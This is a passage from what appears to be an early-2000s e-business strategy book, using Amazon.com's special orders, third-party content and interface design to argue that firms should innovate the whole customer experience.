monitor the impact of readily available digital information on their industries. To do that, executives should answer these questions: · Is there an Amazon.com that can squeeze margins in your business? If not, can you create one? · Are there any new entrants in your industry that are leveraging the Web to rewrite the rules? Watch out for a new generation of infomediaries attempting to harness the efficiencies of the Web. Bottom line: Don't take your industry's conditions as a given. You must understand that technology can create conditions in which companies that once were king of the mountain can wake up one day to find no mountain at all. Define Value in Terms of the Whole Customer Experience Identifying new sources of customer value is an important step, but it is not enough. Firms need to innovate the complete customer experience. The ability to streamline the end-to-end experience provides a complete solution and sets visionary companies apart. Amazon.com, for instance, makes the mundane process of comparing, buying, and receiving books an interesting experience that customers find convenient and easy to use. This discussion leads us to the sixth rule of e-business: Don't use technology just to create the product. Use technology to innovate, entertain, and enhance the entire experience surrounding the product, from selection and ordering to receiving and service. Amazon.com has undertaken revolutionary initiatives in customer experience through its user interface. We are aware of few other companies that have bundled experience innovation with traditional elements of brand building as successfully. Amazon.com's layout and linkages are logical, intuitive, and, just as important, entertaining. To create a satisfying shopping experience, the company created an e-retail infrastructure that meets the unspoken needs of customers. For example, hard-to-find, relatively unpopular, out-of-print titles can be traced through Amazon.com's special orders department. When a customer inquires about an out-of-print book, the special orders department contacts suppliers to check availability and, if a copy is located, notifies the customer by e-mail for approval of the price and condition prior to shipping the book. This level of service for a national and international audience is unprecedented in the book retailing business. Amazon.com also provides third-party content, a valuable part of the book purchase process. It includes author interviews and prerelease information, which build a sense of urgency and also help to cement the relationship with heavy users (bibliophiles, in particular); instant order confirmation; customized search engines; editorial analysis; and carefully managed delivery expectations (which set up the user for a positive surprise). These elements combine to create the richness of the Amazon.com experience and have garnered the company a very high customer loyalty rate of more than 58 percent. As business environments become electronic, firms need to think like Amazon.com in terms of resetting consumers' expectations and experiences. Established firms often discount the importance of the experience offered by a product or service as a key differentiator. Traditional customer experiences have temporal and geographic bounds: Customers must go to a specific store at a specific location between certain hours. But the online experience is quite different, and it needs to be familiar, informative, and easy to use. Any company that can wrap experience attributes around a commodity product or service has the chance to be an industry revolutionary. However, implementing an effective experience means more than having an attractive, interactive front end. In the first phase of e-commerce, too many firms got carried away by the interactive front ends that are so easy to generate on the Web, ignoring the fact that there must be an integrated business back end that drives the enterprise to success. Providing satisfying front-end and back-end experiences is a critical skill that separates the men from the boys in e-business. | 计算机 |
Subsets and Splits